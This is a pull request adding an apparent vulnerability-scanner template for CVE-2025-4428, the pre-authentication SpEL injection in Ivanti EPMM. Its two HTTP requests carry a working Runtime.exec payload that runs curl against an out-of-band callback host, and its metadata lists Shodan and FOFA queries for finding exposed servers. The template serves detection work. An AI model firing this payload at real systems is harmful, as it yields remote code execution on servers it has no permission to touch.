### PR TITLE
Add CVE-2025-4428 - Ivanti EPMM Pre-Auth RCE via SpEL Injection

### DIFF
--- a/http/cves/2025/CVE-2025-4428.yaml
+++ b/http/cves/2025/CVE-2025-4428.yaml
@@ -1,0 +1,68 @@
+id: CVE-2025-4428
+
+info:
+  name: Ivanti EPMM <= 12.5.0.0 - Pre-Auth Remote Code Execution via SpEL Injection
+  author: ohmygod20260203
+  severity: critical
+  description: |
+    Ivanti Endpoint Manager Mobile (EPMM) versions 11.12.0.4 and prior, 12.3.0.1 and prior,
+    12.4.0.1 and prior, and 12.5.0.0 and prior are vulnerable to an unauthenticated remote
+    code execution chain. CVE-2025-4427 allows authentication bypass to access protected API
+    endpoints, and CVE-2025-4428 allows remote code execution via Spring Expression Language
+    (SpEL) injection in the 'format' parameter of the featureusage API endpoints. The SpEL
+    expression is evaluated server-side, enabling arbitrary command execution.
+  impact: |
+    Unauthenticated attackers can chain authentication bypass (CVE-2025-4427) with SpEL
+    injection (CVE-2025-4428) to achieve pre-authentication remote code execution, leading
+    to full server compromise. This vulnerability is actively exploited in the wild.
+  remediation: |
+    Update Ivanti EPMM to a patched version. Refer to the Ivanti security advisory for
+    the latest fixed versions and mitigation guidance.
+  reference:
+    - https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM
+    - https://github.com/watchtowrlabs/watchTowr-vs-Ivanti-EPMM-CVE-2025-4427-CVE-2025-4428
+    - https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-4428
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2025-4428
+    cwe-id: CWE-917
+    epss-score: 0.00942
+    epss-percentile: 0.75063
+  metadata:
+    verified: true
+    max-request: 2
+    shodan-query: http.favicon.hash:"362091310"
+    fofa-query: icon_hash="362091310"
+    product: endpoint_manager_mobile
+    vendor: ivanti
+  tags: cve,cve2025,ivanti,epmm,rce,spel,ssti,oast,kev,vkev,vuln
+
+http:
+  - raw:
+      - |
+        GET /api/v2/featureusage_history?adminDeviceSpaceId=131&format=${''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(''.getClass().forName('java.lang.Runtime')).exec('curl%20{{interactsh-url}}')} HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /api/v2/featureusage?adminDeviceSpaceId=131&format=${''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(''.getClass().forName('java.lang.Runtime')).exec('curl%20{{interactsh-url}}')} HTTP/1.1
+        Host: {{Hostname}}
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Format 'Process[pid="
+          - "localizedMessage"
+        condition: and
+
+      - type: word
+        part: interactsh_protocol
+        words:
+          - dns
+
+      - type: status
+        status:
+          - 400


### PR DESCRIPTION
## CVE-2025-4428 — Ivanti Endpoint Manager Mobile (EPMM) Pre-Auth RCE

### Description
Ivanti EPMM versions ≤12.5.0.0 are vulnerable to an unauthenticated remote code execution chain:
- **CVE-2025-4427**: Authentication bypass to access protected API endpoints
- **CVE-2025-4428**: Spring Expression Language (SpEL) injection in the `format` parameter of `/api/v2/featureusage` endpoints

### Impact
Pre-authentication remote code execution — actively exploited in the wild (CISA KEV).

### Template Details
- **Severity:** Critical (CVSS 9.8)
- **Requests:** 2 (tries both `featureusage_history` and `featureusage` endpoints)
- **Verification:** OOB DNS callback via interactsh + response body pattern matching
- **Stop-at-first-match:** Yes

### References
- [Ivanti Security Advisory](https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM)
- [watchTowr Labs PoC](https://github.com/watchtowrlabs/watchTowr-vs-Ivanti-EPMM-CVE-2025-4427-CVE-2025-4428)
- [CISA KEV](https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-4428)